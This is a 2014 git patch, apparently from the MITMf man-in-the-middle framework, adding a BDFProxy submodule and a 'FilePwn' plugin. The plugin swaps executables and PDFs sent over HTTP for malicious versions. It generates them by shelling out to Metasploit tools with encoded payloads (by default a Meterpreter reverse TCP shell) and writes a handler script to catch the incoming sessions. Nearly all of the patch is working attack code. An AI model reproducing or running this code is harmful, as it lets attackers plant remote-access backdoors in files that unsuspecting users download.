From 3572566228c685406155a0fc1419f7ef046094da Mon Sep 17 00:00:00 2001
From: byt3bl33d3r <byt3bl33d3r@gmail.com>
Date: Sat, 12 Jul 2014 07:51:06 +0200
Subject: [PATCH] added submodule bdfproxy

---
 .gitmodules        |  3 ++
 BDFProxy           |  1 +
 bdfproxy           |  1 +
 mitmf.py           |  0
 plugins/FilePwn.py | 87 ++++++++++++++++++++++++++++++++++++++++++++++
 5 files changed, 92 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 BDFProxy
 create mode 160000 bdfproxy
 mode change 100644 => 100755 mitmf.py
 create mode 100644 plugins/FilePwn.py

diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..e462fc6
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "BDFProxy"]
+	path = BDFProxy
+	url = https://github.com/secretsquirrel/BDFProxy
diff --git a/BDFProxy b/BDFProxy
new file mode 160000
index 0000000..cf83fe3
--- /dev/null
+++ b/BDFProxy
@@ -0,0 +1 @@
+Subproject commit cf83fe31011b61230a98464df8485424b6d04ce9
diff --git a/bdfproxy b/bdfproxy
new file mode 160000
index 0000000..cf83fe3
--- /dev/null
+++ b/bdfproxy
@@ -0,0 +1 @@
+Subproject commit cf83fe31011b61230a98464df8485424b6d04ce9
diff --git a/mitmf.py b/mitmf.py
old mode 100644
new mode 100755
diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
new file mode 100644
index 0000000..708c9e2
--- /dev/null
+++ b/plugins/FilePwn.py
@@ -0,0 +1,87 @@
+import os,subprocess,logging,time
+from bdfproxy.bdf_proxy import *
+exe_mimetypes = ['application/octet-stream', 'application/x-msdownload', 'application/exe', 'application/x-exe', 'application/dos-exe', 'vms/exe', 'application/x-winexe', 'application/msdos-windows', 'application/x-msdos-program']
+
+class FilePwn(Plugin):
+    name = "FilePwn"
+    optname = "filepwn"
+    implements = ["handleResponse"]
+    has_opts = True
+    log_level = logging.DEBUG
+    desc = "Backdoor files being sent over http unsing bdproxy"
+    def initialize(self,options):
+        '''Called if plugin is enabled, passed the options namespace'''
+        self.options = options
+        self.msf_file_payload_opts = "LHOST=%s LPORT=%s" % \
+                                      (options.msf_lhost,options.msf_file_lport)
+        self.payloads = {}
+        self._make_files()
+        if options.launch_msf_listener and options.msf_rc == "/tmp/tmp.rc":
+            self._start_msf()
+    def _start_msf(self):
+        f = open("/tmp/tmp.rc","a")
+        f.write('''
+                use multi/handler
+                set PAYLOAD %s
+                set LHOST %s
+                set LPORT %s
+                set ExistOnSession false
+                exploit -j
+        ''' % (self.options.msf_file_payload,self.options.msf_lhost,
+            self.options.msf_file_lport))
+        f.close()
+        
+    def _make_files(self):
+        self.exe_made = False
+        if self.options.exe:
+            self._make_exe()
+        if self.options.pdf:
+            self._make_pdf()
+
+    def _make_exe(self):
+        if self.options.exe_file == None:
+            logging.info("Generating our executable...")
+            msfp = os.path.join(self.options.msf_path,"msfpayload") + " %s %s"
+            msfe = os.path.join(self.options.msf_path,"msfencode") + " %s"
+            payload = msfp%(self.options.msf_file_payload,self.msf_file_payload_opts)
+            encode = msfe % "-t exe -o /tmp/tmp.exe -e x86/shikata_ga_nai -c 8"
+            #print payload+" R |"+encode
+            os.system(payload+" R |"+encode)
+            self.exe_made = True
+            self.exe = "/tmp/tmp.exe"
+        else:
+            self.exe = self.options.exe_file
+        self.exe_payload = open(self.exe,"rb").read()
+        if self.options.exe:
+            for m in exe_mimetypes:
+                self.payloads[m] = self.exe_payload
+
+    def _make_pdf(self):
+        logging.info("Generating our PDF...")
+        if self.options.pdf_exploit.find("embedded_exe") != -1:
+            if not self.exe_made:
+                self._make_exe()
+            if self.msf_file_payload_opts.find("EXEFILE") == -1:
+                self.msf_file_payload_opts += " EXEFILE=" + self.exe
+        if self.msf_file_payload_opts.find("INFILENAME") == -1:
+            self.msf_file_payload_opts += " INFILENAME=" + \
+                                                  os.path.join(self.options.full_path,"data/blank.pdf")
+        self.msf_file_payload_opts += " FILENAME=/tmp/tmp.pdf"
+        msfc = os.path.join(self.options.msf_path,"msfcli") + " %s %s E"
+        os.system(msfc % (self.options.pdf_exploit,self.msf_file_payload_opts))
+        self.payloads['application/pdf'] = open("/tmp/tmp.pdf","rb").read()
+    
+    def handleResponse(self,request,data):
+        #print "http://" + request.client.getRequestHostname() + request.uri
+        ch = request.client.headers['Content-Type']
+        #print ch
+        if ch in self.payloads:
+            print "Replaced file of mimtype %s with malicious version" % ch
+            data = self.payloads[ch]
+            return {'request':request,'data':data}
+        else:
+            return
+
+    def add_options(self,options):
+        options.add_argument("--msf-file-payload",type=str,default="windows/meterpreter/reverse_tcp",
+                help="Payload you want to use (default: windows/meterpreter/reverse_tcp)")